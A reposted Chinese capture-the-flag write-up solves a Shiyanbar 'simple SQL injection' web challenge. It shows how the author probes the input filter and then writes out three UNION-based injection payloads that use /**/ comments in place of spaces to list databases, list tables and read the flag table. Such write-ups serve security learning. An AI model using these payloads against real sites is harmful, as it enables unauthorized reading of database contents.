码迷,mamicode.com
首页 > 数据库 > 详细

实验吧 简单的SQL注入1

时间:2018-11-04 00:29:28      阅读:148      评论:0      收藏:0      [点我收藏+]

标签:bsp   name   bar   com   实验   返回   ctf   sql注入   ble   

解题链接: http://ctf5.shiyanbar.com/423/web/

解题思路:一,   输入1,不报错;输入1‘,报错;输入1‘‘,不报错。

二 ,   输入1 and 1=1,返回1 1=1,可知,and被过滤了。

三,    输入1 union select,返回1 select,猜测关键词被过滤。

四,    用/**/代替空格,爆库:1‘/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/‘1‘=‘1。

五,  爆表:1‘/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/‘1‘=‘1。

六,  最后一步:1‘/**/union/**/select/**/flag/**/from/**/flag/**/where/**/‘1‘=‘1。

实验吧 简单的SQL注入1

标签:bsp   name   bar   com   实验   返回   ctf   sql注入   ble   

原文地址:https://www.cnblogs.com/whitehawk/p/9902576.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!